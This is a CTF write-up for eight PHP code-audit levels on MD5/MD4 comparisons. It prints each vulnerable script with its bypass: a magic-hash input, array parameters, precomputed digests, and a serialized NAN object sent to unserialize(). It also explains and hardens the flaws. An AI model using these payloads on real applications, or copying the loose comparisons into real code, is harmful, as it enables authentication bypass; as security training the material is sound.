[PHP Knowledge Base][CTF] PHP code-audit exercises on MD5 comparisons

Exercise 1

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-01.php");

    if(isset($_GET["pass"])){
        if($_GET["pass"] != hash("md4", $_GET["pass"])){
            die('fail~~~');
        }else{
            echo "success!!!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-02.php'>下一关</a>";
        }
    }else{
        echo "please input the pass";
    }
?>

Function analysis:

isset()   // checks whether a variable is declared and its value is not NULL

Code audit:

The value passed in pass must equal its own MD4 hash to obtain the flag.

Solution:

A known MD4 "magic hash": both the input and its digest have the form 0e followed only by digits, so PHP's == treats them as numeric strings and compares 0 == 0. The value is: 0e251288019

∴ pass=0e251288019
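As an added illustration (not code from the write-up; the function names are my own), the following PHP shows why the pass-01.php check accepts a value of this form and what the hardened comparison looks like:

```php
<?php
// Added example, not part of the original write-up: why the pass-01.php
// check accepts "0e251288019", and what the hardened comparison looks like.

// PHP treats a string of the form 0e<digits> as a numeric string (scientific
// notation for zero). `==` on two numeric strings compares them as numbers,
// so "0e251288019" == "0e<any other digits>" is 0 == 0, i.e. true.
function isZeroLikeNumericString(string $s): bool
{
    return preg_match('/^0e\d+$/', $s) === 1;
}

// Shape of the vulnerable check in the write-up: loose comparison between
// the raw input and its MD4 digest.
function looseCheck(string $pass): bool
{
    return $pass == hash('md4', $pass);
}

// Hardened shape: hash_equals() compares byte by byte in constant time and
// never applies numeric coercion, so a "0e..." input only passes when its
// digest is literally the same string, which it is not.
function strictCheck(string $pass): bool
{
    return hash_equals(hash('md4', $pass), $pass);
}

$pass   = '0e251288019';   // the value given in the write-up
$digest = hash('md4', $pass);

printf("input  %s zero-like: %s\n", $pass,   var_export(isZeroLikeNumericString($pass), true));
printf("digest %s zero-like: %s\n", $digest, var_export(isZeroLikeNumericString($digest), true));
printf("loose  check: %s\n", var_export(looseCheck($pass), true));
printf("strict check: %s\n", var_export(strictCheck($pass), true));
```

The same replacement of == by hash_equals() (or ===) is the fix for every later exercise that compares digests loosely.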

Exercise 2

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-02.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) == md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-03.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

Code audit:

The user and pass values obtained via GET must differ, while their MD5 hashes must be equal.

Solution:

Pass in arrays: md5() of an array returns NULL (with a warning), so both sides compare as NULL == NULL.

Array bypass gives:
http://……/?user[]=1&pass[]=2

Exercise 3

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-03.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if(!ctype_alpha($user) && !is_numeric($pass) && md5($user) == md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-04.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

Function analysis:

ctype_alpha()   // checks whether every character of the given argument is a letter
is_numeric()   // checks whether a variable is a number or a numeric string

Code audit:

A "!" in front of a function negates it, so the branch requires the function to return false.
user must not be alphabetic, pass must be neither a number nor a numeric string,
and the MD5 hashes of the two must be equal.

Likewise, bypass with arrays:
http://……/?user[]=0&pass[]=a
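As an added example covering exercises 2 and 3 (not code from the write-up; the function names and the parsed query string are my own), the following PHP shows why array parameters satisfy these checks and how type validation rejects them:

```php
<?php
// Added example, not part of the original write-up: why ?user[]=1&pass[]=2
// satisfies the checks in pass-02.php and pass-03.php, and how to reject it.

// Shape of the vulnerable check. On PHP 7.x md5() given an array emits a
// warning and returns NULL, so md5([1]) == md5([2]) is NULL == NULL (true),
// while [1] != [2] is also true. ctype_alpha() and is_numeric() both return
// false for arrays, which is why the same trick clears pass-03.php.
// On PHP 8 md5() throws a TypeError for an array argument instead.
function vulnerableCheck($user, $pass): bool
{
    return $user != $pass && @md5($user) == @md5($pass);
}

// Hardened shape: require scalar strings before anything is hashed, and
// compare digests with hash_equals() (strict and constant-time).
function hardenedCheck($user, $pass): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;   // arrays, NULL, objects: reject before hashing
    }
    return $user !== $pass && hash_equals(md5($user), md5($pass));
}

// Constructed query string, parsed the way PHP fills $_GET.
parse_str('user[]=1&pass[]=2', $q);

try {
    $vuln = vulnerableCheck($q['user'], $q['pass']);
} catch (TypeError $e) {   // PHP 8 behaviour
    $vuln = 'TypeError: ' . $e->getMessage();
}
var_dump($vuln);                                   // true on PHP 7, TypeError on PHP 8
var_dump(hardenedCheck($q['user'], $q['pass']));   // false: arrays rejected
var_dump(hardenedCheck('a', 'a'));                 // false: identical strings
```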

Exercise 4

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-04.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) == md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-05.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

Code audit:
This problem applies MD5 twice; the conditions impose few restrictions, and the main one to satisfy is

md5($user) == md5(md5($pass))

which simplifies to:

$user == md5($pass)

So we can write a little PHP:

<?php
    echo md5(1);
    echo "<br>";
    echo md5(md5(1));
?>

Result:

c4ca4238a0b923820dcc509a6f75849b
28c8edde3d61a0411511d3b1866f0636

Final answer:

http://……/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

Note: compare the following two URLs

http://192.168.1.1/pass-04/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1
http://192.168.1.1/pass-04/?user=c4ca4238a0b923820dcc509a6f75849b &pass=1

The user values sent by these two URLs are different: the second has an extra space before "&pass=1", so user arrives with a trailing space and its MD5 no longer equals md5(md5(1)).

Exercise 5

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-05.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user != $pass && md5($user) === md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-06.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

Code audit:
The main difficulty is:

md5($user) === md5(md5($pass))

Similar to exercise 4; compare the equality operators:

=== compares both the values and the types of two variables
== compares only the values of two variables, not their data types

Final answer:

http://……/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

Exercise 6

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-06.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = (string)$_GET['user'];
        $pass = (string)$_GET['pass'];

        if($user != $pass && md5($user) == md5(md5($pass))){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-07.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

No further explanation needed.
Final answer:

http://……/?user=c4ca4238a0b923820dcc509a6f75849b&pass=1

Exercise 7

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-07.php");

    if(isset($_GET['user']) && isset($_GET['pass'])){
        $user = $_GET['user'];
        $pass = $_GET['pass'];

        if($user !== $pass && md5($user) === md5($pass)){
            echo "success!<br>";
            echo file_get_contents('flag.txt')."\n";
            echo "<a href='pass-08.php'>下一关</a>";
        }else{
            echo "fail~~~";
        }

    }else{
        echo "please input the user and pass!"."\n";
    }
?>

No further explanation needed; bypass directly with arrays.
Final answer:

http://……/?user[]=0&pass[]=1

Exercise 8

PHP code:

 <?php
    error_reporting(0);
    highlight_file("pass-08.php");

    class auth{
        public $user;
        public $pass;

        public function __destruct(){

            $this->user = (string)$this->user;
            if(strlen($this->user) > 3 || strlen($this->pass) >3){
                echo "level1 is fail~~~";
            }
            if($this->user !== $this->pass && $this->user != $this->pass && md5($this->user) === md5($this->pass)){
                echo "success!<br>";    
                echo file_get_contents("flag.txt");
            }else{
                echo "level2 is fail~~~";
            }
        }
    }
    unserialize($_POST['auth']);
?> 

Function analysis:

__destruct()   // the destructor is the counterpart of the constructor: it is called automatically only just before the object is collected by the garbage collector (i.e. before the object is removed from memory). A destructor lets us perform specific actions before an object is destroyed, such as closing files or freeing result sets.
strlen()   // returns the length of a string
unserialize()   // deserializes an object or array that was serialized with serialize() and returns the original object structure

Solution:
Because the final step deserializes the POST input, we construct a class matching the challenge code and serialize an instance of it:

<?php

    class auth
    {
        public $user;
        public $pass;
    }

    $a = new auth();
    $a->user = NAN;
    $a->pass = NAN;
    echo serialize($a);

?>

Output:

O:4:"auth":2:{s:4:"user";d:NAN;s:4:"pass";d:NAN;}

Submitted via POST, the final answer is:

auth=O:4:"auth":2:{s:4:"user";d:NAN;s:4:"pass";d:NAN;}

Key points:
1. About NAN and INF

NAN represents an invalid number (not a number)
INF represents infinity

2. NAN

NAN === (string)NAN   // false
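As an added example for exercise 8 (not the challenge's own code; the function names are my own, and the class below is a stand-in for the challenge's auth class), the following PHP shows why the NAN payload satisfies the destructor check and the two fixes a defender would apply:

```php
<?php
// Added example, not the challenge's own code: why the NAN payload satisfies
// the pass-08.php destructor on PHP 7.x, and two fixes a defender would apply.

// 1. The property the payload relies on. NAN is never identical to itself, and
// the destructor casts only $user to string, so "NAN" !== NAN holds. md5()
// coerces the float to the string "NAN", so both digests match. The != leg
// is version dependent: PHP 7 converts "NAN" to 0, and 0 != NAN is true;
// PHP 8 compares a number with a non-numeric string as strings, so
// "NAN" != NAN is false there and this function returns false.
function nanPassesCheck(): bool
{
    $user = (string)NAN;
    $pass = NAN;
    return $user !== $pass && $user != $pass && md5($user) === md5($pass);
}

// 2. Hardened comparison: refuse non-string properties, so floats (NAN, INF),
// arrays and NULL never reach the comparison, and make the length rule a
// hard reject (the challenge only echoes a message and continues).
function hardenedCheck($user, $pass): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }
    if (strlen($user) > 3 || strlen($pass) > 3) {
        return false;
    }
    return $user !== $pass && hash_equals(md5($user), md5($pass));
}

// 3. Do not let untrusted data instantiate application classes. With
// allowed_classes => false the object is restored as __PHP_Incomplete_Class,
// so auth::__destruct() (and the file read inside it) never runs.
class auth
{
    public $user;
    public $pass;
    public function __destruct() { echo "auth::__destruct ran\n"; }
}
function safeUnserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

$payload = 'O:4:"auth":2:{s:4:"user";d:NAN;s:4:"pass";d:NAN;}'; // from the write-up
var_dump(nanPassesCheck());                                          // true on PHP 7.x
var_dump(hardenedCheck('NAN', NAN));                                 // false
var_dump(safeUnserialize($payload) instanceof __PHP_Incomplete_Class); // true
```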
Added: 2021-12-06 15:03:32  Updated: 2021-12-06 15:03:55
 